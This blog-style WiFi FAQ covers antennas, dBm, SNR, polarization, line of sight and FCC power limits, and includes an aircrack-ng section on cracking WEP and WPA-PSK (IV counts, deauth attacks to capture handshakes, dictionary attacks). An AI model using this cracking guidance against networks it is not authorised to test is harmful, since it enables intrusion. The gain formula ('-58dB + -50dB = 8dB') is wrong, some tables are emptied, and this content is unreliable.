Q: What are the differences between an Omni antenna, Panel antenna, Parabolic antenna, Sectors antenna, and the Yagi antenna’s?

A: Antenna differences: An Omni antenna is omnidirectional. In other words, the signal is transmitted and received equally in all directions. (Ignoring such influences as trees, terrain, large buildings, etc.)

Panel antennae, Parabolic antennae, Sectors antennae, and the Yagi antennae are all directional antennae. They all have different applications, which is highly dependant on the particular setup.

For example: A Sector antenna is usually design to cover a wide pie shaped area. The width of the sector they cover typically ranges from 60° to 180°. Usually they are used to provide specific regional coverage for broadcast areas of WISPs (Wireless Internet Service Providers) or similar applications.
Q: What is all this talk about dB and deciBels. I thought radio power is expressed in Watts?
Q: Why are deciBels expressed in negative numbers in NetStumbler?
Q: Why doesn’t SNR equal Signal/Noise?

A: Decibels (or dB) is a REFERENCE value only. You have to reference it to a known value such as power in watts, milliwatts or voltage in volts, millivolts and microvolts. For power, dB
is expressed as:

dB = 10 * log10(p)

Now with that in mind:

Transmitters, such as those used in commercial microwave transmitters are referenced to 1 milliwatt. So

0 dBm = 10 log10(1 mW)

therefore a transmitter of 1 watt would be a +30 dbm transmitter, a 1/2 watt transmitter would be +27 dbm or a 0 dbm transmitter would be 1 milliwatt.

0 dbm= 1 milliwatt
10 dbm= 10 milliwatts
20 dbm= 100 milliwatts
30 dbm= 1000 milliwats or 1 watt

Received signal strength reads negative numbers because of the free space and path loss of the signal; a negative number simply means the power is less than 1mW. Thus, a negative dB value represents a loss, and a positive one represents a gain.

The noise floor is the signal strength of the background noise, which is caused by man made devices and nature, such as the sun.

Your signal to noise ratio (SNR) is how high your signal is above that noise floor. So if your noise floor is -92dB and your signal is -82dB, then your SNR is 10. Note that the SNR is obtained by subtracting the noise value from the signal instead of dividing because the signal and noise are expressed in dB. Thus:

SNR = S(mW)/N(mW) = S(dBm) – N(dBm)

Q: I’ve been told that omnidirectional antennae will increase the range as the dB increases, but that the pattern gets flatter, and I may miss detecting APs. What does this mean?A:For those of you who are scratching their heads over this, this may help visualize it better. Think of it this way: Omnidirectional antenna patterns are doughnut shaped. As you increase the dB rating, the doughnut’s volume doesn’t change, it gets flatter. It squishes flat. (yech!)Here are two views of antenna patterns, a 5dB and a 10dB, using the same theoretical tx/rx point. ( BTW, not to belabor the obvious, but someone will probably point his out if I don’t: The diagrams are not to scale with each orther.)The top diagram shows the patterns from above, while the lower diagram shows the pattern from the side.The black is the 5dB pattern, the blue is the 10dB pattern, and the red are APs that someone is trying to find.AP1. Not detected. Within range of 10dB, but below signal area. Out of range for the 5dB.
AP2. Detected by 5db. Within range of of both; but only within the the signal area of 5dB. The 10dB would not have detected it.
AP3. Not detected. Within range of 10dB, but above signal area. Out of the range of the 5dB.
AP4. Detected by 10dB. Barely within range.
AP5. Detected by either 5dB or 10dB.
Q: What about adding multiple antennae? An you run two omni’s in tandem, or would the additional impedance screw up both?A: Directly connecting two antennae into one lead will cause impedience problems. You’d need a splitter/combiner or switch for it to work right. That adds loss to the system, so you’d probably not gain too much.NOTE: Since this was first answered, some reasonable cost and low loss splitter/combiners have appeared on the 2.4GHz consumer market. Links will be added here as time permints.
Q: What does polarization mean?
Q: Is the radiation pattern of the horizontal simply flipped 90 degress as opposed to the vertical?
Q: Very few antennea seem to be horizontal polarized and tend to cost quite a bit more. Why are horizontal polarized antennae costlier?
Q: I built a homebrew antenna. How do I find its polarization?A: Here is an answer from:
Antenna Polarization
Polarization is defined as the orientation of the electric field of an electromagnetic wave. Polarization is in general described by an ellipse. Two often used special cases of elliptical polarization are linear polarization and circular polarization. The initial polarization of a radio wave is determined by the antenna that launches the waves into space. The environment through which the radio wave passes on its way from the transmit antenna to the receive antenna may cause a change in polarization.With linear polarization the electric field vector stays in the same plane. In circular polarization the electric field vector appears to be rotating with circular motion about the direction of propagation, making one full turn for each RF cycle. The rotation may be right-hand or left-hand.Choice of polarization is one of the design choices available to the RF system designer. For example, low frequency (< 1 MHz) vertically polarized radio waves propagate much more successfully near the earth than horizontally polarized radio waves, because horizontally polarized waves will be cancelled out by reflections from the earth. Mobile radio systems waves generally are vertically polarized. TV broadcasting has adopted horizontal polarization as a standard. This choice was made to maximize signal-to-noise ratios. At frequencies above 1 GHz, there is little basis for a choice of horizontal or vertical polarization, although in specific applications, there may be some possible advantage in one or the other. Circular polarization has also been found to be of advantage in some microwave radar applications to minimize the “clutter” echoes received from raindrops, in relation to the echoes from larger targets such as aircraft. Circular polarization can also be used to reduce multipath.
————–Basically, the radiation pattern is independent of the polarization. If you take 2 vertically polarized antennae and turn one on its side, you’ll receive almost no signal between the two – this is called cross-polarization. If you’re having trouble visualizing polarization, think of it in terms of light; it works the same way w/ other electromagnetic radiation such as WiFi. LCD panels work on the principle of polarization, by the way. the dark bits of the screen have the polarization 90 deg off.The reason the vertically polarized omni antennae tend to be cheaper is that they are usually collinears, which are cheap and easy to make because basically, they are just plastic tubes with some wire inside. A slotted waveguide is an example of a horizontally polarized omni – they are big metal tubes which are machined at close tolerances, so you can see why the materials and labor cost more.
Q: How do you measure the gain? I would like to visually see the difference of my antenna vs. plain card.A: Below is the quick and dirty way. Be advised this is very rough and very prone to error.
1) Get the best (strongest) dB level reading from a known AP using the card. This X dB. (eg -58dB)2) Don’t change the location or orientation. Plug in the antenna, get a new reading. This is Y dB. (eg -50dB)Y + X = Antenna gain in dB. (Addition because these are negative values.)-58dB + -50dB = 8dB.In this example the gain would be 8dB.

How many IVs are required to crack WEP ?

WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP (64 bit key) can be cracked with 300,000 IVs, and 104-bit WEP (128 bit key) can be cracked with 1,500,000 IVs; if you’re out of luck you may need two million IVs, or more.
There’s no way to know the WEP key length: this information is kept hidden and never announced, either in management or data packets; as a consequence, airodump-ng can not report the WEP key length. Thus, it is recommended to run aircrack-ng twice: when you have 250,000 IVs, start aircrack-ng with ”-n 64” to crack 40-bit WEP. Then if the key isn’t found, restart aircrack-ng (without the -n option) to crack 104-bit WEP.

With the introduction of the PTW technique in aircrack-ng 0.9, the number of data packets required to crack WEP is dramatically lowered. Using this technique, 40-bit WEP (64 bit key) can be cracked with as few as 20,000 data packets and 104-bit WEP (128 bit key) with 40,000 data packets.
There is one critical requirement: packets must be ARP.

How can I know what is the key length ?

You can’t know what’s the key lenght, there’s no information at all in wireless packets, that’s why you have to try differents lengths. Most of the time, it’s a 128 bit key.

How do I know my WEP key is correct ?

Just because you seem to have successfully connected to the access point doesn’t mean your WEP key is correct! To check your WEP key, the best way is to decrypt a capture file with the airdecap-ng program.

How can I crack a WPA-PSK network ?

You must sniff until a handshake takes place between a wireless client and the access point. To force the client to reauthenticate, you can start a deauth attack with aireplay-ng. Also, a good dictionary is required.

FYI, it’s not possible to pre-compute large tables of Pairwise Master Keys like rainbowcrack does, since the passphrase is salted with the ESSID.

What are the authentication modes for WEP ?

There are two authentication modes for WEP:

  • Open System Authentication: This is the default mode. All clients are accepted by the AP, and the key is never checked meaning association is always granted. However if your key is incorrect you won’t be able to receive or send packets (because decryption will fail), so DHCP, ping etc. will timeout.
  • Shared Key Authentication: The client has to encrypt a challenge before association is granted by the AP. This mode is flawed and leads to keystream recovery, so it’s never enabled by default.

Can I use Wireshark/Ethereal to capture 802.11 packets ?

Under Linux, simply setup the card in monitor mode with the airmon-ng script. Under Windows, Wireshark can capture 802.11 packets using AirPcap. Except in very rare cases, Ethereal cannot capture 802.11 packets under Windows.

Can Wireshark/Ethereal decode WEP or WPA data packets ?

Recent versions of Ethereal and Wireshark can decrypt WEP. Go to Edit → Preferences → Protocols → IEEE 802.11, select 1 in the “WEP key count” and enter your WEP key below.

Wireshark 0.99.5 and above can decrypt WPA as well. Go to Edit → Preferences → Protocols → IEEE 802.11, select “Enable decryption”, and fill in the key according to the instructions in the preferences window. You can also select “Decryption Keys…” from the wireless toolbar if it’s displayed.

How to use spaces, double quote and single quote, etc. in AP names?

  • You have to prefix those special characters with a “\”. This is called escaping a special character. Examples: with\’singlequote, with\”doublequote.
  • You also need to handle the symbol ”&” the same way. Example: “A&B”.
  • You can use single quotes. Examples: ‘with space’, ‘with”doublequote’.
  • As well, you can use double quotes. Examples: “with space”, “with’singlequote”.

NOTE: If you enclose the AP name in single or double quotes, then you don’t also need to escape special characters within the single or double quotes.

IMPORTANT EXCEPTION: If the AP name contains ”!” then special care must be taken. The reason is that the bash interpreter thinks you want to repeat a previous command. Your options are:

  • Use single quotes as in ‘name!with!bang’.
  • Escape the ”!” as in name\!with\!bang.
  • Use double quotes plus the escape as in “name\!with\!bang”

Sometimes the AP name contains leading or trailing spaces. These can be very hard to identify from the airodump-ng screen. Here are a few methods to deal with this situation:

  • The airodump-ng text file includes the SSID (AP name) length. So you can compare the length in the text file to the count of visible characters. If the airodump-ng text file count is greater then you know that the SSID has leading or trailing spaces.
  • Use wireshark to look at the beacon. Unless the SSID is hidden, the SSID is in quotes and you should be able to see leading/trailing spaces.
  • The 1.0svn version of aireplay-ng will automatically pull the correct SSID from the beacon for you assuming it is not hidden. Simply omit the SSID parameter from aireplay-ng.

What is the size of ARP packets ?

When captured through a wireless interface, 68 bytes is typical for arp packets originating from wireless clients. 86 bytes is typical for arp requests from wired clients.

On Ethernet, ARP packets when received are typically 60 bytes long. When this is then relayed by a wireless access point, they are 86 bytes. This is, of course, because of the wireless headers. If a wireless client sends an ARP, they are typically 42 bytes long and they become 68 when relayed by the AP.

What are the allowed rates ?

Modulation Allowed rates
DSSS / CCK 1M, 2M, 5.5M, 11M
OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M

How do I convert the HEX characters to ASCII?

Here are some conversion links. Remember to put % in front of each hex character when going from hex to ascii.

LatinSud has developed a very useful tool – Javascript WEP Conversion Tool. It can perform a variety of WEP, ASCII and passphrase conversions.

Why do I have bad speeds when i’m too close to the access point?

Problem: The wireless card behaves badly if the signal is too strong. If you are too close (1-2m) to the access point, you get high quality signal but actual transmission rates drop (down to 5-11Mbps or less). The net result is TCP throughput of about 600KB/s.

This is called antenna and receiver saturation. The signal coming in to the preamplifier is too strong and clips the input of the amplifier, causing signal degradation. This is a normal phenomenon with most 802.11 hardware.

So, is it a driver problem or is it my network hardware?

Neither, really. It’s a physics problem. The only solution is to either decrease transmission power, use an antenna with a lower gain factor, or move the access point farther away from the station. You should use wired ethernet when you’re close to the access point. If you don’t want or you don’t have a wire, you can also decrease output power of your Access point or your card.

Why do I get ioctl(SIOCGIFINDEX) failed: No such device ?

Double check that your device name is correct and that you haven’t forgotten a parameter on the command line.

Why do I get ‘SIOCSIFFLAGS : No such file or directory’ error message

Some drivers require a firmware to be loaded (bcm43xx, prism54, zd1211, …). The driver does it by itself when loaded.
In this case, the driver didn’t find it because the firmware was not in the right place. To find the firmware’s correct location, read the driver documentation.

My network card changes it’s name from eth0 to eth1

Or even to eth2 or from wlan0 to wlan1 or … You know the symptoms mean if you suffer this problem. This happens when you change your MAC and UDEV thinks it has detected a new network card. UDEV keeps track of this so that your nwc-naming keeps mixed up even after a reboot.

Solution: Disable this function in UDEV

Open /etc/udev/persistent-net-generator.rules in your prefered text editor

Search for

 KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\
 	IMPORT{program}="write_net_rules $attr{address}"

and change it to

 #KERNEL=="eth*|ath*|wlan*|ra*|sta*", DRIVERS=="?*",\

What is RSSI?

RSSI is means Received Signal Strength Indication. RSSI is a measurement of the received radio signal strength. It is the received signal strength in a wireless environment, in arbitrary units.

For more information, see http://en.wikipedia.org/wiki/RSSI

What is the difference with long and short preamble?

Every packet is sent with a preamble, which is just a known pattern of bits at the beginning of the packet so that the receiver can sync up and be ready for the real data. This preamble must be sent at the basic rate (1 Mbps), according to the official standard. But there are two different kinds of preambles, short and long. The long preamble has a field size of 128 bits, while the short preamble is only 56 bits.

Will I get better range with maximum output power?

No, this is a false assumption in most situations.

In a home environment, the best output power is not always the maximum. In most situations, 30mw is enough. However, if you are a long distance from the AP, then yes, maximum output power is the best.

Do wifi amplifiers have a better range?

No, amplifiers are not a very good idea because:

  1. Amplifiers also amplify noise and that’s not a good thing for link quality
  2. With high amplification, you could get a headache

You are much better off purchasing a good antenna with high gain.

My card says that I have 20dBm (100mW) but i only have 18dBm, why?

Most cards have 100mW when combined with the antenna (2dBi antenna).

In 802.11a and 802.11g, the output power is 30mW due to modulation (it’s a bit harder to use OFDM than CCK)

Will I have better reception with stronger transmit power?

No, the transmit power is not linked with receiving at all. For receiving, you should check the receive sensitivity of your card. As well, you are much better off purchasing a good antenna with high gain

Understanding Radio Line of Sight

Radio transmission requires a clear path between antennas known as radio line of sight. It is necessary to understand the requirements for radio line of sight when designing a network operating in the 2.4Ghz ISM band.

Line of sight is the direct free-space path that exists between two points. Using binoculars on a clear day, it is easy to determine if visual line of sight exists between two points that are miles apart. To have a clear line of sight there must be no obstructions between the two locations. Often this means that the observation points must be high enough to allow the viewer to see over any ground-based obstructions.

The following obstructions might obscure a visual link:

  • Topographic features, such as mountains
  • The curvature of the Earth
  • Buildings and other man-made objects
  • Trees

If any of these obstructions rise high enough to block the view from end to end, there is no visual line of sight.


Obstructions that can interfere with visual line of sight can also interfere with radio line of sight. But one must also consider the Fresnel effect. If a hard object, such as a mountain ridge or building, is too close to the signal path, it can damage the radio signal or reduce its strength. This happens even though the obstacle does not obscure the direct, visual line of sight.

The Fresnel zone for a radio beam is an elliptical area immediately surrounding the visual path. It varies in thickness depending on the length of the signal path and the frequency of the signal.


As shown in the picture above, when a hard object protrudes into the signal path within the Fresnel zone, knife-edge diffraction can deflect part of the signal and cause it to reach the receiving antenna slightly later than the direct signal. Since these deflected signals are out of phase with the direct signal, they can reduce its power or cancel it out altogether. If trees or other ‘soft’ objects protrude into the Fresnel zone, they can attenuate (reduced the strength of) a passing signal. In short, the fact that you can see a location does not mean that you can establish a quality radio link to that location.

There are several options to establish or improve the line of sight:

  • Raise the antenna mounting point on the existing structure
  • Build a new structure, i.e. radio tower, which is tall enough to mount the antenna
  • Increase the height of an existing tower
  • Locate a different mounting point, i.e. building or tower, for the antenna
  • Cut down problem trees
  • Use a near line of sight technology such a 802.11a (with outdoor long range extensions enabled) or WiMax.


dBm to Watt Conversion Table








1.0 mW


40 mW


1.6 W


1.3 mW


50 mW


2.0 W


1.6 mW


63 mW


2.5 W


2.0 mW


79 mW


3.2 W


2.5 mW


100 mW


4.0 W


3.2 mW


126 mW


5.0 W


4 mW


158 mW


6.3 W


5 mW


200 mW


8.0 W


6 mW


250 mW


10 W


8 mW


316 mW


13 W


10 mW


398 mW


16 W


13 mW


500 mW


20 W


16 mW


630 mW


25 W


20 mW


800 mW


32 W


25 mW


1.0 W


40 W


32 mW


1.3 W


50 W

Usage and Maximum Power Limit Guidelines in the US under FCC regulations Before we can go on, first we need to separate the two different classes of users for Spread Spectrum devices that exist and set some guidelines of some of the specs. Consumers and IT Professionals Operating Spread Spectrum (DSSS) gear:

Users operate under FCC Part 15 rules and regulations.

Frequencies include 902-928 MHz, 2400-2483.5 and 5725-5850 MHz.

Maximum Transmitter Power Output (TPO) is 1.0 watt or 30dBm.

The formula for converting antennas from dBi to dBd is dBi-2.2=dBd.

There are two different classifications for operation. You’ll commonly hear these modes referred to as Point to Point (PTP) and Point to Multipoint (PTMP). PTP is when two sites talk only to themselves. PTMP is when many sites talk to a single core site. Each of these modes have different EIRP (Effective Isotropic Radiated Power) limitations. Point to MultiPoint:

The maximum EIRP power allowed is 36dBm (4 watts).

Maximum transmitter power versus largest antenna table for PTMP:

Transmitter RF power Antenna Gain EIRP in watts 30dBm 1W 6dBi 3.98 27dBm 500mW 9dBi 3.98 24dBm 250mW 12dBi 3.98 20dBm 100mW 15dBi 3.98 17dBm 50mW 18dBi 3.98 14dBm 25mW 21dBi 3.98 10dBm 10mW 24dBi 3.98

Losses from the transmitter via cabling, lightning suppression, filtration can be removed from the transmitted power dBm figure. An example here would be say a 30dBm 1 watt amplifier with 100ft of LMR400 (at 6.7dB of loss) brings transmitter power down to 23.3dBm, allowing a 12dBi antenna.

Point to Point:

Higher EIRP is allowed if the antennas are directional in nature.

Systems operating in a point-to-point operation may employ transmitting antennas with directional gain greater than 6 dBi provided the maximum output power of the transmitter is reduced by 1 dB for every 3 dB that the directional gain of the antenna that exceeds 6 dBi. Maximum transmitter power versus largest antenna table for PTP:

Transmitter     RF power           Antenna Gain      EIRP in watts

30dBm                  1W                                 6dBi              3.98

29dBm             800mW                            9dBi               6.35

28dBm             630mW                             12dBi            10.14

27dBm             500mW                              15dBi          15.81

26dBm             398mW                              18dBi            25.23

25dBm             316mW                               21dBi            40.28

24dBm             250mW                               24dBi           62.79

23dBm             200mW                              27dBi            100.2

This information is provided as a guideline. If you are not a professional installer we highly recommend that you read the FCC Part 15 rules and understand them before attempting installations. Amateur Radio Operators operating under licensed spectrum:

Users operate under FCC Part 97 rules and regulations.

Frequencies usable from over-the-counter consumer gear include the 33cm 902-928 MHz band, the 13cm 2390-2450 MHz band and the 5cm 5650-5925Mhz band.

In the 13cm band, 802.11b/g channels 1 thru 6 are the only channels in the 2390-2450 MHz bandplan.

Maximum Transmitter Power Output (TPO) is 100 watt or 50dBm.

You must enable broadcasting of your SSID, which has to include your callsign.

Encryption is not currently permitted.

Only authorized licensed operators should be able to access Part 97 installed hardware, so care should be taken to prevent unauthorized users from utilizing said hardware.

Percentage of lost or gained signal per dB

dB Change

% Change

dB Change

% Change

dB Change

% Change

































































































This table is designed to help you visualize what changes in dB signal level does in a RF system. The dB change listed above can be reflected as either loss between the radio/transmitter and the antenna, or gain in amplification and antenna. Let's break these two down:

System Gains

* Every 1dB of gain raises your output power 20%, where 3dB doubles output power.
* Antenna gain is a function of size, no matter what design it is. A small antenna that claims unreasonably high gain will not perform as you expect it to. All of the antennas we stock have been tested on a Anritsu antenna analyzer to verify the manufactures rating.

System Losses

* Every 1dB of loss in the system represent a full 20% -loss- of power. Just as in gain, 3dB of loss represents a loss of 50% of your power.
* LMR400 has 6.6dB per 100ft, so keep your runs as short as possible.
* All losses are cumulative, so every element of your system has to be accounted for… Pigtails, coax runs, lightning protectors, etc all have to be added up to get the full view of overall loss.
As you can see, even the smallest
change makes a radical difference.

  1. Pharmf265 says:

    Hello! kaddcae interesting kaddcae site! I’m really like it! Very, very kaddcae good!

  2. Raktim Shrestha says:

    Can anyone tell me what is telnet? and how to telnet wifi service?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s